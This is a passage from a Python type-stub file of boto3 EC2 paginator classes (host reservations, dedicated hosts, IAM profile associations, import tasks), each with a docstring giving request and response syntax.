'PciId': {
'DeviceId': 'string',
'VendorId': 'string',
'SubsystemId': 'string',
'SubsystemVendorId': 'string'
},
'State': {
'Code': 'pending'|'failed'|'available'|'unavailable',
'Message': 'string'
},
'CreateTime': datetime(2015, 1, 1),
'UpdateTime': datetime(2015, 1, 1),
'OwnerId': 'string',
'OwnerAlias': 'string',
'ProductCodes': [
{
'ProductCodeId': 'string',
'ProductCodeType': 'devpay'|'marketplace'
},
],
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'Public': True|False,
'DataRetentionSupport': True|False
},
],
}
**Response Structure**
- *(dict) --*
- **FpgaImages** *(list) --*
Information about the FPGA images.
- *(dict) --*
Describes an Amazon FPGA image (AFI).
- **FpgaImageId** *(string) --*
The FPGA image identifier (AFI ID).
- **FpgaImageGlobalId** *(string) --*
The global FPGA image identifier (AGFI ID).
- **Name** *(string) --*
The name of the AFI.
- **Description** *(string) --*
The description of the AFI.
- **ShellVersion** *(string) --*
The version of the AWS Shell that was used to create the bitstream.
- **PciId** *(dict) --*
Information about the PCI bus.
- **DeviceId** *(string) --*
The ID of the device.
- **VendorId** *(string) --*
The ID of the vendor.
- **SubsystemId** *(string) --*
The ID of the subsystem.
- **SubsystemVendorId** *(string) --*
The ID of the vendor for the subsystem.
- **State** *(dict) --*
Information about the state of the AFI.
- **Code** *(string) --*
The state. The following are the possible values:
* ``pending`` - AFI bitstream generation is in progress.
* ``available`` - The AFI is available for use.
* ``failed`` - AFI bitstream generation failed.
* ``unavailable`` - The AFI is no longer available for use.
- **Message** *(string) --*
If the state is ``failed`` , this is the error message.
- **CreateTime** *(datetime) --*
The date and time the AFI was created.
- **UpdateTime** *(datetime) --*
The time of the most recent update to the AFI.
- **OwnerId** *(string) --*
The AWS account ID of the AFI owner.
- **OwnerAlias** *(string) --*
The alias of the AFI owner. Possible values include ``self`` , ``amazon`` , and ``aws-marketplace`` .
- **ProductCodes** *(list) --*
The product codes for the AFI.
- *(dict) --*
Describes a product code.
- **ProductCodeId** *(string) --*
The product code.
- **ProductCodeType** *(string) --*
The type of product code.
- **Tags** *(list) --*
Any tags assigned to the AFI.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **Public** *(boolean) --*
Indicates whether the AFI is public.
- **DataRetentionSupport** *(boolean) --*
Indicates whether data retention support is enabled for the AFI.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type FpgaImageIds: list
:param FpgaImageIds:
The AFI IDs.
- *(string) --*
:type Owners: list
:param Owners:
Filters the AFI by owner. Specify an AWS account ID, ``self`` (owner is the sender of the request), or an AWS owner alias (valid values are ``amazon`` | ``aws-marketplace`` ).
- *(string) --*
:type Filters: list
:param Filters:
The filters.
* ``create-time`` - The creation time of the AFI.
* ``fpga-image-id`` - The FPGA image identifier (AFI ID).
* ``fpga-image-global-id`` - The global FPGA image identifier (AGFI ID).
* ``name`` - The name of the AFI.
* ``owner-id`` - The AWS account ID of the AFI owner.
* ``product-code`` - The product code.
* ``shell-version`` - The version of the AWS Shell that was used to create the bitstream.
* ``state`` - The state of the AFI (``pending`` | ``failed`` | ``available`` | ``unavailable`` ).
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``update-time`` - The time of the most recent update.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeHostReservationOfferings(Paginator):
def paginate(self, Filters: List = None, MaxDuration: int = None, MinDuration: int = None, OfferingId: str = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_host_reservation_offerings`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeHostReservationOfferings>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxDuration=123,
MinDuration=123,
OfferingId='string',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'OfferingSet': [
{
'CurrencyCode': 'USD',
'Duration': 123,
'HourlyPrice': 'string',
'InstanceFamily': 'string',
'OfferingId': 'string',
'PaymentOption': 'AllUpfront'|'PartialUpfront'|'NoUpfront',
'UpfrontPrice': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **OfferingSet** *(list) --*
Information about the offerings.
- *(dict) --*
Details about the Dedicated Host Reservation offering.
- **CurrencyCode** *(string) --*
The currency of the offering.
- **Duration** *(integer) --*
The duration of the offering (in seconds).
- **HourlyPrice** *(string) --*
The hourly price of the offering.
- **InstanceFamily** *(string) --*
The instance family of the offering.
- **OfferingId** *(string) --*
The ID of the offering.
- **PaymentOption** *(string) --*
The available payment option.
- **UpfrontPrice** *(string) --*
The upfront price of the offering. Does not apply to No Upfront offerings.
:type Filters: list
:param Filters:
The filters.
* ``instance-family`` - The instance family of the offering (for example, ``m4`` ).
* ``payment-option`` - The payment option (``NoUpfront`` | ``PartialUpfront`` | ``AllUpfront`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type MaxDuration: integer
:param MaxDuration:
This is the maximum duration of the reservation to purchase, specified in seconds. Reservations are available in one-year and three-year terms. The number of seconds specified must be the number of seconds in a year (365x24x60x60) times one of the supported durations (1 or 3). For example, specify 94608000 for three years.
:type MinDuration: integer
:param MinDuration:
This is the minimum duration of the reservation you\'d like to purchase, specified in seconds. Reservations are available in one-year and three-year terms. The number of seconds specified must be the number of seconds in a year (365x24x60x60) times one of the supported durations (1 or 3). For example, specify 31536000 for one year.
:type OfferingId: string
:param OfferingId:
The ID of the reservation offering.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeHostReservations(Paginator):
def paginate(self, Filters: List = None, HostReservationIdSet: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_host_reservations`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeHostReservations>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
HostReservationIdSet=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'HostReservationSet': [
{
'Count': 123,
'CurrencyCode': 'USD',
'Duration': 123,
'End': datetime(2015, 1, 1),
'HostIdSet': [
'string',
],
'HostReservationId': 'string',
'HourlyPrice': 'string',
'InstanceFamily': 'string',
'OfferingId': 'string',
'PaymentOption': 'AllUpfront'|'PartialUpfront'|'NoUpfront',
'Start': datetime(2015, 1, 1),
'State': 'payment-pending'|'payment-failed'|'active'|'retired',
'UpfrontPrice': 'string',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **HostReservationSet** *(list) --*
Details about the reservation's configuration.
- *(dict) --*
Details about the Dedicated Host Reservation and associated Dedicated Hosts.
- **Count** *(integer) --*
The number of Dedicated Hosts the reservation is associated with.
- **CurrencyCode** *(string) --*
The currency in which the ``upfrontPrice`` and ``hourlyPrice`` amounts are specified. At this time, the only supported currency is ``USD`` .
- **Duration** *(integer) --*
The length of the reservation's term, specified in seconds. Can be ``31536000 (1 year)`` | ``94608000 (3 years)`` .
- **End** *(datetime) --*
The date and time that the reservation ends.
- **HostIdSet** *(list) --*
The IDs of the Dedicated Hosts associated with the reservation.
- *(string) --*
- **HostReservationId** *(string) --*
The ID of the reservation that specifies the associated Dedicated Hosts.
- **HourlyPrice** *(string) --*
The hourly price of the reservation.
- **InstanceFamily** *(string) --*
The instance family of the Dedicated Host Reservation. The instance family on the Dedicated Host must be the same in order for it to benefit from the reservation.
- **OfferingId** *(string) --*
The ID of the reservation. This remains the same regardless of which Dedicated Hosts are associated with it.
- **PaymentOption** *(string) --*
The payment option selected for this reservation.
- **Start** *(datetime) --*
The date and time that the reservation started.
- **State** *(string) --*
The state of the reservation.
- **UpfrontPrice** *(string) --*
The upfront price of the reservation.
- **Tags** *(list) --*
Any tags assigned to the Dedicated Host Reservation.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type Filters: list
:param Filters:
The filters.
* ``instance-family`` - The instance family (for example, ``m4`` ).
* ``payment-option`` - The payment option (``NoUpfront`` | ``PartialUpfront`` | ``AllUpfront`` ).
* ``state`` - The state of the reservation (``payment-pending`` | ``payment-failed`` | ``active`` | ``retired`` ).
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type HostReservationIdSet: list
:param HostReservationIdSet:
The host reservation IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeHosts(Paginator):
def paginate(self, Filters: List = None, HostIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_hosts`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeHosts>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
HostIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Hosts': [
{
'AutoPlacement': 'on'|'off',
'AvailabilityZone': 'string',
'AvailableCapacity': {
'AvailableInstanceCapacity': [
{
'AvailableCapacity': 123,
'InstanceType': 'string',
'TotalCapacity': 123
},
],
'AvailableVCpus': 123
},
'ClientToken': 'string',
'HostId': 'string',
'HostProperties': {
'Cores': 123,
'InstanceType': 'string',
'Sockets': 123,
'TotalVCpus': 123
},
'HostReservationId': 'string',
'Instances': [
{
'InstanceId': 'string',
'InstanceType': 'string'
},
],
'State': 'available'|'under-assessment'|'permanent-failure'|'released'|'released-permanent-failure',
'AllocationTime': datetime(2015, 1, 1),
'ReleaseTime': datetime(2015, 1, 1),
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **Hosts** *(list) --*
Information about the Dedicated Hosts.
- *(dict) --*
Describes the properties of the Dedicated Host.
- **AutoPlacement** *(string) --*
Whether auto-placement is on or off.
- **AvailabilityZone** *(string) --*
The Availability Zone of the Dedicated Host.
- **AvailableCapacity** *(dict) --*
The number of new instances that can be launched onto the Dedicated Host.
- **AvailableInstanceCapacity** *(list) --*
The total number of instances supported by the Dedicated Host.
- *(dict) --*
Information about the instance type that the Dedicated Host supports.
- **AvailableCapacity** *(integer) --*
The number of instances that can still be launched onto the Dedicated Host.
- **InstanceType** *(string) --*
The instance type size supported by the Dedicated Host.
- **TotalCapacity** *(integer) --*
The total number of instances that can be launched onto the Dedicated Host.
- **AvailableVCpus** *(integer) --*
The number of vCPUs available on the Dedicated Host.
- **ClientToken** *(string) --*
Unique, case-sensitive identifier that you provide to ensure idempotency of the request. For more information, see `How to Ensure Idempotency <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Run_Instance_Idempotency.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
- **HostId** *(string) --*
The ID of the Dedicated Host.
- **HostProperties** *(dict) --*
The hardware specifications of the Dedicated Host.
- **Cores** *(integer) --*
The number of cores on the Dedicated Host.
- **InstanceType** *(string) --*
The instance type size that the Dedicated Host supports (for example, ``m3.medium`` ).
- **Sockets** *(integer) --*
The number of sockets on the Dedicated Host.
- **TotalVCpus** *(integer) --*
The number of vCPUs on the Dedicated Host.
- **HostReservationId** *(string) --*
The reservation ID of the Dedicated Host. This returns a ``null`` response if the Dedicated Host doesn't have an associated reservation.
- **Instances** *(list) --*
The IDs and instance type that are currently running on the Dedicated Host.
- *(dict) --*
Describes an instance running on a Dedicated Host.
- **InstanceId** *(string) --*
the IDs of instances that are running on the Dedicated Host.
- **InstanceType** *(string) --*
The instance type size (for example, ``m3.medium`` ) of the running instance.
- **State** *(string) --*
The Dedicated Host's state.
- **AllocationTime** *(datetime) --*
The time that the Dedicated Host was allocated.
- **ReleaseTime** *(datetime) --*
The time that the Dedicated Host was released.
- **Tags** *(list) --*
Any tags assigned to the Dedicated Host.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type Filters: list
:param Filters:
The filters.
* ``auto-placement`` - Whether auto-placement is enabled or disabled (``on`` | ``off`` ).
* ``availability-zone`` - The Availability Zone of the host.
* ``client-token`` - The idempotency token that you provided when you allocated the host.
* ``host-reservation-id`` - The ID of the reservation assigned to this host.
* ``instance-type`` - The instance type size that the Dedicated Host is configured to support.
* ``state`` - The allocation state of the Dedicated Host (``available`` | ``under-assessment`` | ``permanent-failure`` | ``released`` | ``released-permanent-failure`` ).
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type HostIds: list
:param HostIds:
The IDs of the Dedicated Hosts. The IDs are used for targeted instance launches.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeIamInstanceProfileAssociations(Paginator):
def paginate(self, AssociationIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_iam_instance_profile_associations`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeIamInstanceProfileAssociations>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
AssociationIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'IamInstanceProfileAssociations': [
{
'AssociationId': 'string',
'InstanceId': 'string',
'IamInstanceProfile': {
'Arn': 'string',
'Id': 'string'
},
'State': 'associating'|'associated'|'disassociating'|'disassociated',
'Timestamp': datetime(2015, 1, 1)
},
],
}
**Response Structure**
- *(dict) --*
- **IamInstanceProfileAssociations** *(list) --*
Information about the IAM instance profile associations.
- *(dict) --*
Describes an association between an IAM instance profile and an instance.
- **AssociationId** *(string) --*
The ID of the association.
- **InstanceId** *(string) --*
The ID of the instance.
- **IamInstanceProfile** *(dict) --*
The IAM instance profile.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the instance profile.
- **Id** *(string) --*
The ID of the instance profile.
- **State** *(string) --*
The state of the association.
- **Timestamp** *(datetime) --*
The time the IAM instance profile was associated with the instance.
:type AssociationIds: list
:param AssociationIds:
The IAM instance profile associations.
- *(string) --*
:type Filters: list
:param Filters:
The filters.
* ``instance-id`` - The ID of the instance.
* ``state`` - The state of the association (``associating`` | ``associated`` | ``disassociating`` | ``disassociated`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeImportImageTasks(Paginator):
def paginate(self, DryRun: bool = None, Filters: List = None, ImportTaskIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_import_image_tasks`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeImportImageTasks>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
ImportTaskIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ImportImageTasks': [
{
'Architecture': 'string',
'Description': 'string',
'Encrypted': True|False,
'Hypervisor': 'string',
'ImageId': 'string',
'ImportTaskId': 'string',
'KmsKeyId': 'string',
'LicenseType': 'string',
'Platform': 'string',
'Progress': 'string',
'SnapshotDetails': [
{
'Description': 'string',
'DeviceName': 'string',
'DiskImageSize': 123.0,
'Format': 'string',
'Progress': 'string',
'SnapshotId': 'string',
'Status': 'string',
'StatusMessage': 'string',
'Url': 'string',
'UserBucket': {
'S3Bucket': 'string',
'S3Key': 'string'
}
},
],
'Status': 'string',
'StatusMessage': 'string'
},
],
}
**Response Structure**
- *(dict) --*
Contains the output for DescribeImportImageTasks.
- **ImportImageTasks** *(list) --*
A list of zero or more import image tasks that are currently active or were completed or canceled in the previous 7 days.
- *(dict) --*
Describes an import image task.
- **Architecture** *(string) --*
The architecture of the virtual machine.
Valid values: ``i386`` | ``x86_64``
- **Description** *(string) --*
A description of the import task.
- **Encrypted** *(boolean) --*
Indicates whether the image is encrypted.
- **Hypervisor** *(string) --*
The target hypervisor for the import task.
Valid values: ``xen``
- **ImageId** *(string) --*
The ID of the Amazon Machine Image (AMI) of the imported virtual machine.
- **ImportTaskId** *(string) --*
The ID of the import image task.
- **KmsKeyId** *(string) --*
The identifier for the AWS Key Management Service (AWS KMS) customer master key (CMK) that was used to create the encrypted image.
- **LicenseType** *(string) --*
The license type of the virtual machine.
- **Platform** *(string) --*
The description string for the import image task.
- **Progress** *(string) --*
The percentage of progress of the import image task.
- **SnapshotDetails** *(list) --*
Information about the snapshots.
- *(dict) --*
Describes the snapshot created from the imported disk.
- **Description** *(string) --*
A description for the snapshot.
- **DeviceName** *(string) --*
The block device mapping for the snapshot.
- **DiskImageSize** *(float) --*
The size of the disk in the snapshot, in GiB.
- **Format** *(string) --*
The format of the disk image from which the snapshot is created.
- **Progress** *(string) --*
The percentage of progress for the task.
- **SnapshotId** *(string) --*
The snapshot ID of the disk being imported.
- **Status** *(string) --*
A brief status of the snapshot creation.
- **StatusMessage** *(string) --*
A detailed status message for the snapshot creation.
- **Url** *(string) --*
The URL used to access the disk image.
- **UserBucket** *(dict) --*
The S3 bucket for the disk image.
- **S3Bucket** *(string) --*
The S3 bucket from which the disk image was created.
- **S3Key** *(string) --*
The file name of the disk image.
- **Status** *(string) --*
A brief status for the import image task.
- **StatusMessage** *(string) --*
A descriptive status message for the import image task.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
Filter tasks using the ``task-state`` filter and one of the following values: active, completed, deleting, deleted.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type ImportTaskIds: list
:param ImportTaskIds:
A list of import image task IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeImportSnapshotTasks(Paginator):
def paginate(self, DryRun: bool = None, Filters: List = None, ImportTaskIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_import_snapshot_tasks`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeImportSnapshotTasks>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
ImportTaskIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ImportSnapshotTasks': [
{
'Description': 'string',
'ImportTaskId': 'string',
'SnapshotTaskDetail': {
'Description': 'string',
'DiskImageSize': 123.0,
'Encrypted': True|False,
'Format': 'string',
'KmsKeyId': 'string',
'Progress': 'string',
'SnapshotId': 'string',
'Status': 'string',
'StatusMessage': 'string',
'Url': 'string',
'UserBucket': {
'S3Bucket': 'string',
'S3Key': 'string'
}
}
},
],
}
**Response Structure**
- *(dict) --*
Contains the output for DescribeImportSnapshotTasks.
- **ImportSnapshotTasks** *(list) --*
A list of zero or more import snapshot tasks that are currently active or were completed or canceled in the previous 7 days.
- *(dict) --*
Describes an import snapshot task.
- **Description** *(string) --*
A description of the import snapshot task.
- **ImportTaskId** *(string) --*
The ID of the import snapshot task.
- **SnapshotTaskDetail** *(dict) --*
Describes an import snapshot task.
- **Description** *(string) --*
The description of the snapshot.
- **DiskImageSize** *(float) --*
The size of the disk in the snapshot, in GiB.
- **Encrypted** *(boolean) --*
Indicates whether the snapshot is encrypted.
- **Format** *(string) --*
The format of the disk image from which the snapshot is created.
- **KmsKeyId** *(string) --*
The identifier for the AWS Key Management Service (AWS KMS) customer master key (CMK) that was used to create the encrypted snapshot.
- **Progress** *(string) --*
The percentage of completion for the import snapshot task.
- **SnapshotId** *(string) --*
The snapshot ID of the disk being imported.
- **Status** *(string) --*
A brief status for the import snapshot task.
- **StatusMessage** *(string) --*
A detailed status message for the import snapshot task.
- **Url** *(string) --*
The URL of the disk image from which the snapshot is created.
- **UserBucket** *(dict) --*
The S3 bucket for the disk image.
- **S3Bucket** *(string) --*
The S3 bucket from which the disk image was created.
- **S3Key** *(string) --*
The file name of the disk image.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
The filters.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type ImportTaskIds: list
:param ImportTaskIds:
A list of import snapshot task IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeInstanceCreditSpecifications(Paginator):
def paginate(self, DryRun: bool = None, Filters: List = None, InstanceIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_instance_credit_specifications`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeInstanceCreditSpecifications>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
InstanceIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'InstanceCreditSpecifications': [
{
'InstanceId': 'string',
'CpuCredits': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **InstanceCreditSpecifications** *(list) --*
Information about the credit option for CPU usage of an instance.
- *(dict) --*
Describes the credit option for CPU usage of a T2 or T3 instance.
- **InstanceId** *(string) --*
The ID of the instance.
- **CpuCredits** *(string) --*
The credit option for CPU usage of the instance. Valid values are ``standard`` and ``unlimited`` .
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
The filters.
* ``instance-id`` - The ID of the instance.
